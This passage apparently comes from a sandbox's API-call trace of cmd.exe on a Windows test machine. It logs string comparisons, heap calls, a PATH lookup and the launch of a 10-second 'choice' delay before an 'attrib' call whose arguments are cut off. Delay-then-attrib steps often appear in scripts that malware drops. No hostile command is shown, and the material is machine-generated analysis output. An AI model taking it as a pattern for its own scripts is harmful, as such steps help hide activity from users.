_String2="TITLE") returned -17 [0249.941] _wcsicmp (_String1="choice", _String2="START") returned -16 [0249.941] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0249.941] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0249.941] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0249.941] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0249.941] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0249.941] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0249.941] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0249.941] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0249.941] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0249.941] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0249.941] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0249.941] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0249.941] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0249.941] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0249.941] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0249.941] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0249.941] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0249.942] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0249.942] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0249.942] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0249.942] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0249.942] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0249.942] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0249.942] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0249.942] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0249.942] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0249.942] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0249.942] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0249.942] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0249.942] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0249.942] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0249.942] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0249.942] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0249.942] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0249.942] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0249.942] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0249.942] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0249.942] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0249.942] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0249.942] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0249.942] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0249.942] _wcsicmp (_String1="choice", _String2="START") returned -16 [0249.942] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0249.942] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0249.943] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0249.943] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0249.943] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0249.943] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0249.943] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0249.943] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0249.943] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0249.943] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0249.943] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0249.943] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0249.943] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0249.943] ??_V@YAXPAX@Z () returned 0x1 [0249.944] GetProcessHeap () returned 0x2ca0000 [0249.944] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xffd6) returned 0x2cbdf10 [0249.945] GetProcessHeap () returned 0x2ca0000 [0249.945] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x30) returned 0x2caf910 [0249.945] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0249.945] malloc (_Size=0xffce) returned 0x43d2d30 [0249.945] ??_V@YAXPAX@Z () returned 0x5df02c [0249.946] GetProcessHeap () returned 0x2ca0000 [0249.946] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x1ffa4) returned 0x2ccdef0 [0249.949] SetErrorMode (uMode=0x0) returned 0x0 [0249.949] SetErrorMode (uMode=0x1) returned 0x0 [0249.949] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x2ccdef8, lpFilePart=0x5df04c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x5df04c*="Desktop") returned 0x17 [0249.949] SetErrorMode (uMode=0x0) returned 0x1 [0249.949] GetProcessHeap () returned 0x2ca0000 [0249.949] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2ccdef0, Size=0x46) returned 0x2ccdef0 [0249.949] GetProcessHeap () returned 0x2ca0000 [0249.949] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2ccdef0) returned 0x46 [0249.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0249.950] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0249.950] GetProcessHeap () returned 0x2ca0000 [0249.950] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x1b4) returned 0x2cbcbb8 [0249.950] GetProcessHeap () returned 0x2ca0000 [0249.950] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x360) returned 0x2cbcd78 [0249.958] GetProcessHeap () returned 0x2ca0000 [0249.958] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cbcd78, Size=0x1b6) returned 0x2cbcd78 [0249.958] GetProcessHeap () returned 0x2ca0000 [0249.958] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2cbcd78) returned 0x1b6 [0249.958] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.958] GetProcessHeap () returned 0x2ca0000 [0249.959] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xe0) returned 0x2cbcf38 [0249.959] GetProcessHeap () returned 0x2ca0000 [0249.959] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cbcf38, Size=0x76) returned 0x2cbcf38 [0249.959] GetProcessHeap () returned 0x2ca0000 [0249.959] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2cbcf38) returned 0x76 [0249.960] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.960] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x5dedd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5dedd8) returned 0xffffffff [0249.960] GetLastError () returned 0x2 [0249.960] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.960] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x5dedd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5dedd8) returned 0xffffffff [0249.964] GetLastError () returned 0x2 [0249.964] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.965] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x5dedd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5dedd8) returned 0x2cb7278 [0249.965] GetProcessHeap () returned 0x2ca0000 [0249.965] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x0, Size=0x14) returned 0x2cb5ae8 [0249.965] FindClose (in: hFindFile=0x2cb7278 | out: hFindFile=0x2cb7278) returned 1 [0249.965] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x5dedd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5dedd8) returned 0xffffffff [0249.965] GetLastError () returned 0x2 [0249.965] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x5dedd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5dedd8) returned 0x2cb7038 [0249.965] GetProcessHeap () returned 0x2ca0000 [0249.965] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cb5ae8, Size=0x4) returned 0x2cb50b0 [0249.965] FindClose (in: hFindFile=0x2cb7038 | out: hFindFile=0x2cb7038) returned 1 [0249.966] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0249.966] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0249.966] ??_V@YAXPAX@Z () returned 0x1 [0249.966] GetConsoleTitleW (in: lpConsoleTitle=0x5df2dc, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0250.148] InitializeProcThreadAttributeList (in: lpAttributeList=0x5df208, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5df1f4 | out: lpAttributeList=0x5df208, lpSize=0x5df1f4) returned 1 [0250.148] UpdateProcThreadAttribute (in: lpAttributeList=0x5df208, dwFlags=0x0, Attribute=0x60001, lpValue=0x5df1f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5df208, lpPreviousValue=0x0) returned 1 [0250.148] GetStartupInfoW (in: lpStartupInfo=0x5df240 | out: lpStartupInfo=0x5df240*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0250.149] GetProcessHeap () returned 0x2ca0000 [0250.149] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x18) returned 0x2cb5a88 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0250.149] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0250.150] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0250.151] _wcsnicmp (_String1="COPYCMD", _String2="__COMPA", _MaxCount=0x7) returned 4 [0250.151] GetProcessHeap () returned 0x2ca0000 [0250.151] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb5a88) returned 1 [0250.151] GetProcessHeap () returned 0x2ca0000 [0250.151] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xa) returned 0x2cb0e70 [0250.151] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0250.179] _get_osfhandle (_FileHandle=1) returned 0x90 [0250.179] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0250.310] _get_osfhandle (_FileHandle=0) returned 0x8c [0250.310] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0250.450] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5df190*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5df1dc | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x5df1dc*(hProcess=0x254, hThread=0x250, dwProcessId=0xd28, dwThreadId=0x137c)) returned 1 [0250.550] CloseHandle (hObject=0x250) returned 1 [0250.551] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0250.551] GetProcessHeap () returned 0x2ca0000 [0250.551] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cbbd30) returned 1 [0250.551] GetEnvironmentStringsW () returned 0x2cbbd30* [0250.551] GetProcessHeap () returned 0x2ca0000 [0250.551] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb62) returned 0x2cb9bd0 [0250.551] FreeEnvironmentStringsA (penv="=") returned 1 [0250.551] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0xffffffff) returned 0x0 [0264.216] GetExitCodeProcess (in: hProcess=0x254, lpExitCode=0x5df174 | out: lpExitCode=0x5df174*=0x1) returned 1 [0264.216] CloseHandle (hObject=0x254) returned 1 [0264.216] _vsnwprintf (in: _Buffer=0x5df25c, _BufferCount=0x13, _Format="%08X", _ArgList=0x5df17c | out: _Buffer="00000001") returned 8 [0264.216] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0264.216] GetProcessHeap () returned 0x2ca0000 [0264.217] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb9bd0) returned 1 [0264.217] GetEnvironmentStringsW () returned 0x2cb9bd0* [0264.217] GetProcessHeap () returned 0x2ca0000 [0264.217] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb88) returned 0x2ccead0 [0264.217] FreeEnvironmentStringsA (penv="=") returned 1 [0264.217] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0264.217] GetProcessHeap () returned 0x2ca0000 [0264.217] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2ccead0) returned 1 [0264.217] GetEnvironmentStringsW () returned 0x2cb9bd0* [0264.217] GetProcessHeap () returned 0x2ca0000 [0264.217] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb88) returned 0x2ccead0 [0264.217] FreeEnvironmentStringsA (penv="=") returned 1 [0264.217] GetProcessHeap () returned 0x2ca0000 [0264.217] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb0e70) returned 1 [0264.217] DeleteProcThreadAttributeList (in: lpAttributeList=0x5df208 | out: lpAttributeList=0x5df208) [0264.217] ??_V@YAXPAX@Z () returned 0x1 [0264.217] GetConsoleTitleW (in: lpConsoleTitle=0x5df708, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0264.317] malloc (_Size=0xffce) returned 0x43c2d58 [0264.317] ??_V@YAXPAX@Z () returned 0x5df494 [0264.317] malloc (_Size=0xffce) returned 0x43d2d30 [0264.317] ??_V@YAXPAX@Z () returned 0x5df24c [0264.317] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0264.317] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0264.317] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0264.317] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0264.317] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0264.317] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0264.317] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0264.317] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0264.317] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0264.317] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0264.317] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0264.317] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0264.317] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0264.317] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0264.317] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0264.318] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0264.318] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0264.318] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0264.318] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0264.318] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0264.318] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0264.318] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0264.318] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0264.318] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0264.318] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0264.318] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0264.318] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0264.318] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0264.318] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0264.318] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0264.318] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0264.318] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0264.318] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0264.318] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0264.318] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0264.318] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0264.318] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0264.318] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0264.318] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0264.318] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0264.318] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0264.318] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0264.318] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0264.318] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0264.318] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0264.318] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0264.318] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0264.318] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0264.319] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0264.319] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0264.319] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0264.319] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0264.319] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0264.319] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0264.319] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0264.319] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0264.319] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0264.319] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0264.319] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0264.319] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0264.319] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0264.319] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0264.319] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0264.319] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0264.319] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0264.319] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0264.319] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0264.319] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0264.319] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0264.319] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0264.319] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0264.319] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0264.319] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0264.319] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0264.319] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0264.319] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0264.319] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0264.320] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0264.320] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0264.320] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0264.320] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0264.320] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0264.320] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0264.320] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0264.320] _wcsicmp (_String1="attrib", _String2="FOR") returned -5 [0264.320] _wcsicmp (_String1="attrib", _String2="IF") returned -8 [0264.320] _wcsicmp (_String1="attrib", _String2="REM") returned -17 [0264.320] ??_V@YAXPAX@Z () returned 0x1 [0264.320] GetProcessHeap () returned 0x2ca0000 [0264.320] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xffd6) returned 0x2ccf660 [0264.321] GetProcessHeap () returned 0x2ca0000 [0264.321] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x70) returned 0x2cbd0e8 [0264.321] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0264.321] malloc (_Size=0xffce) returned 0x43d2d30 [0264.321] ??_V@YAXPAX@Z () returned 0x5defcc [0264.321] GetProcessHeap () returned 0x2ca0000 [0264.321] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x1ffa4) returned 0x2cdf640 [0264.324] SetErrorMode (uMode=0x0) returned 0x0 [0264.324] SetErrorMode (uMode=0x1) returned 0x0 [0264.324] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x2cdf648, lpFilePart=0x5defec | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x5defec*="Desktop") returned 0x17 [0264.324] SetErrorMode (uMode=0x0) returned 0x1 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cdf640, Size=0x46) returned 0x2cdf640 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2cdf640) returned 0x46 [0264.324] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0264.324] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x1b4) returned 0x2ca0ae0 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x360) returned 0x2ca0ca0 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2ca0ca0, Size=0x1b6) returned 0x2ca0ca0 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2ca0ca0) returned 0x1b6 [0264.324] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.324] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xe0) returned 0x2cbd160 [0264.324] GetProcessHeap () returned 0x2ca0000 [0264.325] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cbd160, Size=0x76) returned 0x2cbd160 [0264.325] GetProcessHeap () returned 0x2ca0000 [0264.325] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2cbd160) returned 0x76 [0264.325] GetDriveTypeW 